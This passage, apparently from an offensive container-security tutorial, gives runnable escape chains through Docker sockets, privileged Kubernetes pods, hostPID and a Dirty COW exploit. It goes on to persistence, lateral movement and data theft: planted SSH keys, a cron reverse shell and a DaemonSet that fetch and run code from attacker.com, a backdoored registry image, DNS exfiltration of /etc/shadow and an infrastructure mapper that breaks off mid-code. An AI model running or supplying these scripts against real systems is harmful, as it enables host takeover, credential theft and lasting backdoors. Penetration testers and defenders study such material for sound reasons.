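Inside the pod, the service account token mounted at the default path is your starting point. A minimal sketch of the first checks to run (the stock ubuntu image ships without curl, so install it first):

# Inside vulnerable-pod
apt-get update && apt-get install -y curl

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# Confirm the excessive permissions granted above
curl -sk -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'$NS'"}}' \
  https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews

# List secrets with the over-permissive role
curl -sk -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/$NS/secrets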

Building Custom Escape Chains

Now let's combine multiple techniques to create sophisticated escape chains that work in hardened environments.

Container Escape Methodology

A systematic approach to container escape; a minimal reconnaissance sketch follows the list:

  1. Reconnaissance: Understand the environment
  2. Capability Analysis: Identify available privileges
  3. Vulnerability Identification: Find weaknesses
  4. Exploit Development: Build custom exploits
  5. Privilege Escalation: Gain higher privileges
  6. Persistence: Maintain access
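
To make step 1 concrete, here's the minimal reconnaissance I run first (these are the standard paths and tools; hardened environments may differ or lack some binaries):

# Quick in-container reconnaissance
cat /proc/1/cgroup                                                        # container runtime hints
grep Cap /proc/self/status                                                # effective/bounding capabilities
ls -la /var/run/docker.sock /run/containerd/containerd.sock 2>/dev/null   # exposed runtime sockets
ls /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null             # Kubernetes service account
mount | grep -Ei 'docker|overlay|/host'                                   # interesting mounts
uname -r                                                                  # kernel version for known CVEs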

Docker Socket + Kernel Exploit Chain

#!/bin/bash
# docker_kernel_chain.sh - Combined exploit chain

echo "[+] Starting container escape chain..."

# First, check if Docker socket is available
if [ -S /var/run/docker.sock ]; then
    echo "[+] Docker socket found, attempting primary escape vector"
    
    # Create a container with elevated privileges
    echo "[+] Creating privileged container"
    CONTAINER_ID=$(curl -s -X POST \
      --unix-socket /var/run/docker.sock \
      -H "Content-Type: application/json" \
      -d '{"Image":"ubuntu:20.04","Cmd":["/bin/sleep","infinity"],"Privileged":true}' \
      http://localhost/containers/create | grep -o '"Id":"[^"]*' | cut -d':' -f2 | tr -d '"')
    
    if [ -z "$CONTAINER_ID" ]; then
        echo "[-] Failed to create container"
    else
        echo "[+] Container created: $CONTAINER_ID"
        
        # Start the container
        echo "[+] Starting privileged container"
        curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          http://localhost/containers/$CONTAINER_ID/start
        
        # Execute command to prove host access
        echo "[+] Testing host access via privileged container"
        EXEC_ID=$(curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          -H "Content-Type: application/json" \
          -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/etc/shadow"]}' \
          http://localhost/containers/$CONTAINER_ID/exec | grep -o '"Id":"[^"]*' | cut -d':' -f2 | tr -d '"')
        
        echo "[+] Executing command in privileged container"
        curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          -H "Content-Type: application/json" \
          -d '{"Detach":false,"Tty":false}' \
          http://localhost/exec/$EXEC_ID/start
        
        echo "[+] Cleanup: removing container"
        curl -s -X DELETE \
          --unix-socket /var/run/docker.sock \
          http://localhost/containers/$CONTAINER_ID?force=true
        
        echo "[+] Primary escape vector successful"
        exit 0
    fi
else
    echo "[-] Docker socket not found"
fi

# Secondary vector: CVE-2021-3493 OverlayFS (Ubuntu)
echo "[+] Attempting secondary escape vector: OverlayFS vulnerability"

# Check if we're on a vulnerable Ubuntu version
if grep -q "Ubuntu" /etc/os-release && grep -q "20.04\|18.04\|16.04" /etc/os-release; then
    echo "[+] Potentially vulnerable Ubuntu version found"
    
    # Create exploit code
    cat > /tmp/overlayfs_exploit.c << 'EOF'
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>

/*
 * NOTE: this is a simplified skeleton, not a full CVE-2021-3493 exploit.
 * It only creates an unprivileged user + mount namespace and drops to a shell;
 * the actual overlayfs mount and file-capability smuggling steps are omitted.
 */
static void setup_sandbox(void) {
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0)
        err(1, "unshare()");
}

static void exec_shell(void) {
    char *const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
    err(1, "execve()");
}

int main(int argc, char *argv[]) {
    printf("[+] CVE-2021-3493 OverlayFS Exploit\n");
    
    setup_sandbox();
    
    pid_t pid = fork();
    if (pid == -1)
        err(1, "fork()");
    
    if (pid == 0) {
        exec_shell();
        exit(0);
    }
    
    waitpid(pid, NULL, 0);
    return 0;
}
EOF
    
    # Compile and run exploit
    echo "[+] Compiling OverlayFS exploit"
    gcc -o /tmp/overlayfs_exploit /tmp/overlayfs_exploit.c
    
    echo "[+] Running exploit"
    /tmp/overlayfs_exploit
    
    if [ $? -eq 0 ]; then
        echo "[+] Exploit appears successful"
        # Try to access host shadow file
        if cat /etc/shadow 2>/dev/null; then
            echo "[+] Secondary escape vector successful"
            exit 0
        else
            echo "[-] Could not confirm host access"
        fi
    else
        echo "[-] Exploit failed"
    fi
else
    echo "[-] Not running on a vulnerable Ubuntu version"
fi

# Tertiary vector: Dirty COW (older kernels)
echo "[+] Attempting tertiary escape vector: Dirty COW"

# Check kernel version
KERNEL_VERSION=$(uname -r)
echo "[+] Kernel version: $KERNEL_VERSION"

if [[ "$KERNEL_VERSION" =~ ^3\. || "$KERNEL_VERSION" =~ ^4\.[0-8] ]]; then
    echo "[+] Potentially vulnerable kernel version found"
    
    # Create Dirty COW exploit
    cat > /tmp/dirty_cow.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg) {
    char *str;
    str = (char *)arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n", c);
    return NULL;
}

void *procselfmemThread(void *arg) {
    char *str;
    str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, (off_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("write %d\n", c);
    close(f);
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t pth1, pth2;
    struct stat st;
    int f = open("/etc/passwd", O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap: %p\n", map);
    
    char *new_passwd = "rootx::0:0:root:/root:/bin/bash\n";
    
    pthread_create(&pth1, NULL, madviseThread, NULL);
    pthread_create(&pth2, NULL, procselfmemThread, new_passwd);
    
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    
    return 0;
}
EOF
    
    # Compile and run exploit
    echo "[+] Compiling Dirty COW exploit"
    gcc -pthread -o /tmp/dirty_cow /tmp/dirty_cow.c
    
    echo "[+] Running exploit"
    /tmp/dirty_cow
    
    # Check if exploit worked
    if grep -q "rootx::" /etc/passwd; then
        echo "[+] Dirty COW exploit successful"
        echo "[+] Try to use: su - rootx"
        exit 0
    else
        echo "[-] Exploit failed or could not be verified"
    fi
else
    echo "[-] Kernel version not likely vulnerable to Dirty COW"
fi

echo "[-] All escape vectors failed"
exit 1

Multi-Stage Exploit Chain Methodology

When working with complex container environments, a single vulnerability often isn't enough. I use this methodology to chain multiple techniques; a minimal driver sketch follows the list:

  1. Identify all potential vulnerabilities through reconnaissance
  2. Prioritize exploits based on reliability and impact
  3. Prepare fallback methods if primary exploits fail
  4. Chain techniques that complement each other
  5. Maintain access once initial escape is achieved
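
To keep the chain manageable, I wrap the prioritized vectors in a small driver that stops at the first success and falls through otherwise. A minimal sketch, where the escape_via_* functions are hypothetical stand-ins for the individual techniques shown elsewhere in this guide:

#!/bin/bash
# chain_driver.sh - try escape vectors in priority order, stop at the first success

try_vector() {
  local name="$1"; shift
  echo "[*] Trying vector: $name"
  if "$@"; then
    echo "[+] Vector succeeded: $name"
    exit 0
  fi
  echo "[-] Vector failed: $name, falling through to the next one"
}

# Hypothetical functions implementing the individual techniques covered in this guide
try_vector "docker socket"   escape_via_docker_socket
try_vector "privileged pod"  escape_via_pod_creation
try_vector "kernel exploit"  escape_via_kernel_exploit

echo "[-] All escape vectors failed"
exit 1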

Kubernetes Pod Spec + Service Account Chain

# kubernetes_chain.yaml - Multi-stage Kubernetes escape chain
apiVersion: v1
kind: Pod
metadata:
  name: escape-chain
  labels:
    app: escape-chain
spec:
  serviceAccountName: default  # Will be used for API access
  hostPID: true  # Step 1: Get host PID namespace
  hostIPC: true  # Step 2: Get host IPC namespace
  containers:
  - name: stage1
    image: ubuntu:20.04
    command: ["bash", "-c", "apt-get update && apt-get install -y curl jq && while true; do sleep 30; done"]
    securityContext:
      privileged: false  # Not privileged initially
    volumeMounts:
    - name: docker-socket  # Step 3: Mount Docker socket
      mountPath: /var/run/docker.sock
    - name: service-account  # Step 4: Access service account token
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
    - name: tmp
      mountPath: /tmp
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
  - name: service-account
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 7200
      # also project the namespace so the script below can read it from the standard path
      - downwardAPI:
          items:
          - path: namespace
            fieldRef:
              fieldPath: metadata.namespace
  - name: tmp
    emptyDir: {}
---
# Included script to execute inside the pod
apiVersion: v1
kind: ConfigMap
metadata:
  name: escape-chain-script
data:
  escape.sh: |
    #!/bin/bash
    
    echo "[+] Starting multi-stage Kubernetes escape chain"
    
    # Stage 1: Check service account permissions
    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
    
    echo "[+] Using service account token in namespace: $NAMESPACE"
    
    # Check permissions
    PERMISSIONS=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
      https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
      -X POST -H "Content-Type: application/json" \
      -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'$NAMESPACE'"}}')
    
    # Extract capabilities
    echo "[+] Checking for pod creation permission"
    if echo $PERMISSIONS | grep -q '"pods"'; then
      if echo $PERMISSIONS | grep -q '"create"'; then
        echo "[+] We have permission to create pods!"
        CAN_CREATE_PODS=true
      fi
    fi
    
    # Stage 2: Docker socket exploitation (if available)
    if [ -S /var/run/docker.sock ]; then
      echo "[+] Docker socket found, using it for escape"
      
      # Create a privileged container with host mount
      echo "[+] Creating privileged container"
      CONTAINER_ID=$(curl -s -X POST \
        --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"Image":"ubuntu:20.04","Cmd":["/bin/sleep","9999"],"Binds":["/:/host"],"Privileged":true}' \
        http://localhost/containers/create | jq -r .Id)
      
      echo "[+] Starting container: $CONTAINER_ID"
      curl -s -X POST --unix-socket /var/run/docker.sock \
        http://localhost/containers/$CONTAINER_ID/start
      
      # Extract host /etc/shadow to prove escape
      echo "[+] Reading host /etc/shadow through container"
      EXEC_ID=$(curl -s -X POST --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/host/etc/shadow"]}' \
        http://localhost/containers/$CONTAINER_ID/exec | jq -r .Id)
      
      curl -s -X POST --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"Detach":false,"Tty":false}' \
        http://localhost/exec/$EXEC_ID/start
      
      echo "[+] Docker socket escape successful"
      exit 0
    fi
    
    # Stage 3: Kubernetes pod creation (if we have permission)
    if [ "$CAN_CREATE_PODS" = true ]; then
      echo "[+] Attempting to create a privileged pod"
      
      # Create a privileged pod manifest
      cat > /tmp/privpod.json << EOF
      {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {
          "name": "privesc-pod",
          "namespace": "$NAMESPACE"
        },
        "spec": {
          "hostPID": true,
          "hostIPC": true,
          "hostNetwork": true,
          "containers": [
            {
              "name": "privesc",
              "image": "ubuntu:20.04",
              "command": ["sleep", "infinity"],
              "securityContext": {
                "privileged": true
              },
              "volumeMounts": [
                {
                  "mountPath": "/host",
                  "name": "hostfs"
                }
              ]
            }
          ],
          "volumes": [
            {
              "name": "hostfs",
              "hostPath": {
                "path": "/"
              }
            }
          ]
        }
      }
    EOF
      
      # Create the pod
      curl -s -k -X POST -H "Authorization: Bearer $TOKEN" \
        -H "Content-Type: application/json" \
        --data-binary @/tmp/privpod.json \
        https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
      
      echo "[+] Waiting for pod to be ready..."
      sleep 10
      
      # Exec into the pod to prove escape
      POD_READY=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
        https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privesc-pod | \
        grep -o '"ready":true')
      
      if [ ! -z "$POD_READY" ]; then
        echo "[+] Pod is ready, creating exec session"
        
        # Create exec operation to read /etc/shadow
        # (the exec subresource needs a SPDY/WebSocket upgrade, so a plain curl POST
        #  won't stream output; the kubectl exec command printed below is the reliable path)
        EXEC_URL=$(curl -s -k -X POST -H "Authorization: Bearer $TOKEN" \
          -H "Content-Type: application/json" \
          -d '{"command":["cat", "/host/etc/shadow"],"stdin":false,"stdout":true,"stderr":true,"tty":false}' \
          https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privesc-pod/exec)
        
        echo "[+] Kubernetes pod escape successful"
        echo "[+] To access the pod: kubectl -n $NAMESPACE exec -it privesc-pod -- bash"
        echo "[+] Then explore the host filesystem at /host"
        exit 0
      else
        echo "[-] Pod not ready, escape may have failed"
      fi
    fi
    
    # Stage 4: hostPID exploitation (if available)
    # Heuristic: with hostPID, /proc/1 is the host's init process rather than the container entrypoint
    if [ "$(cat /proc/1/comm 2>/dev/null)" = "systemd" ] || [ "$(cat /proc/1/comm 2>/dev/null)" = "init" ]; then
      echo "[+] We appear to share the host PID namespace, checking processes"
      
      # Look for interesting processes
      echo "[+] Host processes accessible via /proc:"
      ps aux
      
      # Try to access host files through /proc
      HOST_PID1_ROOT="/proc/1/root"
      if [ -d "$HOST_PID1_ROOT" ]; then
        echo "[+] Attempting to access host files through $HOST_PID1_ROOT"
        ls -la $HOST_PID1_ROOT 2>/dev/null
        cat $HOST_PID1_ROOT/etc/shadow 2>/dev/null
        
        if [ $? -eq 0 ]; then
          echo "[+] hostPID escape successful"
          exit 0
        fi
      fi
    fi
    
    echo "[-] All escape methods failed"
    exit 1

Post-Escape Techniques

Once you've escaped a container, your work is just beginning. Let's explore how to maintain access, move laterally, and extract valuable information from the host environment.

Host Reconnaissance After Escape

After escaping a container, I immediately gather information about the host environment:

# Basic host information
hostname
uname -a
cat /etc/os-release
ip addr
ps aux

# Host users and services
cat /etc/passwd
ls -la /home/
find /home -name "*.ssh" -type d 2>/dev/null
systemctl list-units --type=service

# Container infrastructure
docker ps -a  # If Docker is used
docker images
kubectl get pods -A  # If Kubernetes is used
kubectl get nodes

Persistence Mechanisms

1. SSH Key Planting

One of the most reliable persistence methods is adding SSH keys:

# Find existing SSH directories
find / -name ".ssh" -type d 2>/dev/null

# Generate a new SSH key
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""

# Add to authorized_keys files (create the directory if it doesn't exist yet)
mkdir -p /root/.ssh && chmod 700 /root/.ssh
cat /tmp/backdoor.pub >> /root/.ssh/authorized_keys

# On developer machines, also add to user accounts
for user in $(ls /home/); do
  if [ -d "/home/$user/.ssh" ]; then
    cat /tmp/backdoor.pub >> /home/$user/.ssh/authorized_keys
    echo "Added key to /home/$user/.ssh/authorized_keys"
  fi
done

2. Cron Jobs

Creating cron jobs for persistence:

# Create reverse shell script (single attempt per run; cron provides the retry loop)
cat > /usr/local/bin/system_check.sh << 'EOF'
#!/bin/bash
# System monitoring tool
/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' &
EOF
chmod +x /usr/local/bin/system_check.sh

# Add to crontab (a new callback attempt every 10 minutes)
echo "*/10 * * * * root /usr/local/bin/system_check.sh >/dev/null 2>&1" > /etc/cron.d/system_check
chmod 644 /etc/cron.d/system_check

3. Compromising the Container Runtime

By modifying Docker or container runtime configurations, you can ensure persistence:

# Modify Docker daemon configuration to listen on TCP
cat > /etc/docker/daemon.json << 'EOF'
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
EOF

# Restart Docker to apply changes
systemctl restart docker

# Create a backdoored container image
cat > Dockerfile << 'EOF'
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y openssh-server
RUN mkdir /run/sshd
RUN echo 'root:password' | chpasswd
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
EXPOSE 22
CMD ["/usr/sbin/sshd", "-D"]
EOF

# Build and push to a registry
docker build -t legit-base-image:latest .
docker tag legit-base-image:latest registry.example.com/base-images/ubuntu:latest
docker push registry.example.com/base-images/ubuntu:latest

4. Kubernetes-Specific Persistence

In Kubernetes environments, we can achieve persistence through various resources:

# Create a privileged DaemonSet for persistence across all nodes
cat > persistence-ds.yaml << 'EOF'
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: security-agent
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: security-agent
  template:
    metadata:
      labels:
        app: security-agent
    spec:
      hostPID: true
      hostIPC: true
      hostNetwork: true
      containers:
      - name: agent
        image: ubuntu:20.04
        command: ["/bin/bash", "-c", "while true; do sleep 30; curl -s http://attacker.com/payload.sh | bash; done"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
EOF

# Apply the DaemonSet
kubectl apply -f persistence-ds.yaml

Lateral Movement Across Containers

After escaping a container, I often need to access other containers:

# Using docker command
docker exec -it <container_id> bash

# If the docker CLI isn't available but the socket is: create an exec instance...
EXEC_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["bash"]}' \
  http://localhost/containers/<container_id>/exec | grep -o '"Id":"[^"]*' | cut -d':' -f2 | tr -d '"')
# ...then start it (interactive use also needs the HTTP connection upgraded/hijacked)
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -d '{"Detach":false,"Tty":true}' -H "Content-Type: application/json" \
  http://localhost/exec/$EXEC_ID/start

Network Pivoting Between Containers

# Scan container network
for ip in $(seq 1 254); do
  ping -c 1 -W 1 172.17.0.$ip | grep "64 bytes" &
done

# Forward traffic between container networks (requires privileged container)
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 8080 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Data Exfiltration Techniques

After escaping, I focus on extracting valuable data:

# Find interesting files (group the -name tests so -type f applies to all of them)
find /host -type f \( -name "*.key" -o -name "*.pem" -o -name "id_rsa" -o -name "*.conf" \) 2>/dev/null

# Look for secrets in configuration files
grep -r "password\|secret\|key\|token" /host/etc/ 2>/dev/null
grep -r "password\|secret\|key\|token" /host/opt/ 2>/dev/null
grep -r "password\|secret\|key\|token" /host/var/lib/docker/ 2>/dev/null

# Extract environment variables from running containers
for cid in $(docker ps -q); do
  echo "Container: $cid"
  docker inspect --format '{{range .Config.Env}}{{println .}}{{end}}' $cid
done

# Exfiltrate data via DNS (stealthy)
cat /host/etc/shadow | xxd -p | tr -d '\n' | fold -w 30 | while read exfil; do
  host "$exfil.shadow.exfil.example.com"
done

Infrastructure Mapping Script

After establishing access, I run this script to map the entire container infrastructure:

#!/usr/bin/env python3
# container_infrastructure_mapper.py

import os
import json
import subprocess
import datetime
import socket
import ipaddress
import re

class InfrastructureMapper:
    def __init__(self):
        self.output_file = f"infra_map_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        self.infrastructure = {
            "timestamp": datetime.datetime.now().isoformat(),
            "hostname": socket.gethostname(),
            "ip_addresses": self.get_ip_addresses(),
            "container_runtime": self.detect_container_runtime(),
            "orchestration": self.detect_orchestration(),
            "containers": [],
            "images": [],
            "volumes": [],
            "networks": [],
            "hosts": [],
            "services": [],
            "sensitive_files": []
        }
    
    def get_ip_addresses(self):
        """Get all IP addresses of the host."""
        ip_output = subprocess.getoutput("ip -j addr show")
        try:
            ip_json = json.loads(ip_output)
            ip_addresses = []
            
            for interface in ip_json:
                interface_name = interface.get("ifname", "unknown")
                for addr_info in interface.get("addr_info", []):
                    ip_addresses.append({
                        "interface": interface_name,
                        "address": addr_info.get("local", "unknown"),
                        "family": "ipv4" if addr_info.get("family", "") == "inet" else "ipv6"
                    })
            
            return ip_addresses
        except:
            # Fallback if ip command doesn't support JSON output
            ip_addresses = []
            ip_output = subprocess.getoutput("hostname -I")
            for ip in ip_output.split():
                ip_addresses.append({
                    "interface": "unknown",
                    "address": ip,
                    "family": "ipv4" if "." in ip else "ipv6"
                })
            return ip_addresses
    
    def detect_container_runtime(self):
        """Detect which container runtime is in use."""
        runtime_info = {
            "name": "unknown",
            "version": "unknown",
            "socket_path": None,
            "config_paths": []
        }
        
        # Check for Docker
        docker_version = subprocess.getoutput("docker version --format '{{.Server.Version}}'")
        if "not found" not in docker_version.lower() and "error" not in docker_version.lower():
            runtime_info["name"] = "docker"
            runtime_info["version"] = docker_version
            
            socket_paths = ["/var/run/docker.sock", "/run/docker.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/docker/daemon.json", "/etc/systemd/system/docker.service.d/"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        # Check for containerd
        containerd_version = subprocess.getoutput("containerd --version")
        if "containerd" in containerd_version.lower():
            runtime_info["name"] = "containerd"
            runtime_info["version"] = containerd_version
            
            socket_paths = ["/run/containerd/containerd.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/containerd/config.toml"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        # Check for CRI-O
        crio_version = subprocess.getoutput("crictl --version")
        if "cri-o" in crio_version.lower():
            runtime_info["name"] = "cri-o"
            runtime_info["version"] = crio_version
            
            socket_paths = ["/var/run/crio/crio.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/crio/crio.conf"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        return runtime_info
    
    def detect_orchestration(self):
        """Detect container orchestration platform."""
        orchestration_info = {
            "name": "unknown",
            "version": "unknown",
            "nodes": [],
            "config_paths": []
        }
        
        # Check for Kubernetes
        kubectl_version = subprocess.getoutput("kubectl version --short 2>/dev/null")
        if "server version" in kubectl_version.lower():
            orchestration_info["name"] = "kubernetes"
            server_version_match = re.search(r"Server Version: ([v\d\.]+)", kubectl_version)
            if server_version_match:
                orchestration_info["version"] = server_version_match.group(1)
            
            # Get nodes
            nodes_output = subprocess.getoutput("kubectl get nodes -o json 2>/dev/null")
            try:
                nodes_json = json.loads(nodes_output)
                for node in nodes_json.get("items", []):
                    node_info = {
                        "name": node.get("metadata", {}).get("name", "unknown"),
                        "roles": [],
                        "version": node.get("status", {}).get("nodeInfo", {}).get("kubeletVersion", "unknown"),
                        "internal_ip": "unknown"
                    }
                    
                    # Get node roles
                    for label in node.get("metadata", {}).get("labels", {}):
                        if "node-role.kubernetes.io" in label:
                            role = label.split("/")[1]
                            node_info["roles"].append(role)
                    
                    # Get internal IP
                    for address in node.get("status", {}).get("addresses", []):
                        if address.get("type") == "InternalIP":
                            node_info["internal_ip"] = address.get("address")
                    
                    orchestration_info["nodes"].append(node_info)
            except:
                pass
            
            config_paths = ["/etc/kubernetes/", "/var/lib/kubelet/config.yaml"]
            for path in config_paths:
                if os.path.exists(path):
                    orchestration_info["config_paths"].append(path)
        
        # Check for Docker Swarm
        swarm_info = subprocess.getoutput("docker info | grep -i swarm")
        if "swarm: active" in swarm_info.lower():
            orchestration_info["name"] = "docker_swarm"
            
            # Get nodes
            nodes_output = subprocess.getoutput("docker node ls --format '{{.Hostname}} {{.Status}} {{.ManagerStatus}}'")
            for line in nodes_output.splitlines():
                if not line.strip():
                    continue
                parts = line.split()
                if len(parts) >= 2:
                    hostname = parts[0]
                    status = parts[1]
                    manager_status = "worker"
                    if len(parts) > 2 and parts[2]:
                        manager_status = "manager"
                    
                    orchestration_info["nodes"].append({
                        "name": hostname,
                        "roles": [manager_status],
                        "status": status,
                        "internal_ip": "unknown"
                    })
        
        return orchestration_info
    
    def map_containers(self):
        """Map all running containers."""
        containers = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            containers_output = subprocess.getoutput("docker ps -a --format '{{json .}}'")
            for line in containers_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    container_data = json.loads(line)
                    container_id = container_data.get("ID", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker inspect {container_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            container_info = {
                                "id": container_id,
                                "name": container_data.get("Names", "unknown"),
                                "image": container_data.get("Image", "unknown"),
                                "created": inspect_data.get("Created", "unknown"),
                                "status": container_data.get("Status", "unknown"),
                                "ports": container_data.get("Ports", ""),
                                "command": container_data.get("Command", ""),
                                "privileged": inspect_data.get("HostConfig", {}).get("Privileged", False),
                                "network_mode": inspect_data.get("HostConfig", {}).get("NetworkMode", "unknown"),
                                "mounts": [],
                                "environment": [],
                                "capabilities": {
                                    "added": inspect_data.get("HostConfig", {}).get("CapAdd", []),
                                    "dropped": inspect_data.get("HostConfig", {}).get("CapDrop", [])
                                },
                                "networks": [],
                                "pid_mode": inspect_data.get("HostConfig", {}).get("PidMode", ""),
                                "ipc_mode": inspect_data.get("HostConfig", {}).get("IpcMode", "")
                            }
                            
                            # Extract mounts
                            for mount in inspect_data.get("Mounts", []):
                                container_info["mounts"].append({
                                    "source": mount.get("Source", "unknown"),
                                    "destination": mount.get("Destination", "unknown"),
                                    "mode": mount.get("Mode", "unknown"),
                                    "rw": mount.get("RW", False),
                                    "type": mount.get("Type", "unknown")
                                })
                            
                            # Extract environment variables
                            for env in inspect_data.get("Config", {}).get("Env", []):
                                container_info["environment"].append(env)
                            
                            # Extract networks
                            for network_name, network_config in inspect_data.get("NetworkSettings", {}).get("Networks", {}).items():
                                container_info["networks"].append({
                                    "name": network_name,
                                    "ip_address": network_config.get("IPAddress", "unknown"),
                                    "gateway": network_config.get("Gateway", "unknown"),
                                    "mac_address": network_config.get("MacAddress", "unknown")
                                })
                            
                            containers.append(container_info)
                    except:
                        # If inspect fails, add basic info
                        containers.append({
                            "id": container_id,
                            "name": container_data.get("Names", "unknown"),
                            "image": container_data.get("Image", "unknown"),
                            "status": container_data.get("Status", "unknown")
                        })
                except:
                    continue
        
        # Try using crictl for Kubernetes environments
        elif self.infrastructure["orchestration"]["name"] == "kubernetes":
            containers_output = subprocess.getoutput("crictl ps -a")
            container_lines = containers_output.splitlines()[1:]  # Skip header
            
            for line in container_lines:
                parts = line.split()
                if len(parts) >= 5:
                    container_id = parts[0]
                    image_id = parts[1]
                    created = parts[4]
                    status = parts[3]
                    pod_id = parts[5] if len(parts) > 5 else "unknown"
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"crictl inspect {container_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        
                        container_info = {
                            "id": container_id,
                            "image_id": image_id,
                            "created": created,
                            "status": status,
                            "pod_id": pod_id,
                            "name": inspect_data.get("status", {}).get("metadata", {}).get("name", "unknown"),
                            "mounts": [],
                            "environment": []
                        }
                        
                        # Extract mounts
                        for mount in inspect_data.get("status", {}).get("mounts", []):
                            container_info["mounts"].append({
                                "host_path": mount.get("host_path", "unknown"),
                                "container_path": mount.get("container_path", "unknown"),
                                "readonly": mount.get("readonly", False)
                            })
                        
                        # Extract environment variables
                        for env in inspect_data.get("info", {}).get("runtimeSpec", {}).get("process", {}).get("env", []):
                            container_info["environment"].append(env)
                        
                        containers.append(container_info)
                    except:
                        # If inspect fails, add basic info
                        containers.append({
                            "id": container_id,
                            "image_id": image_id,
                            "created": created,
                            "status": status,
                            "pod_id": pod_id
                        })
        
        self.infrastructure["containers"] = containers
    
    def map_images(self):
        """Map all container images."""
        images = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            images_output = subprocess.getoutput("docker images --format '{{json .}}'")
            for line in images_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    image_data = json.loads(line)
                    image_info = {
                        "repository": image_data.get("Repository", "unknown"),
                        "tag": image_data.get("Tag", "unknown"),
                        "id": image_data.get("ID", "unknown"),
                        "created": image_data.get("CreatedAt", "unknown"),
                        "size": image_data.get("Size", "unknown")
                    }
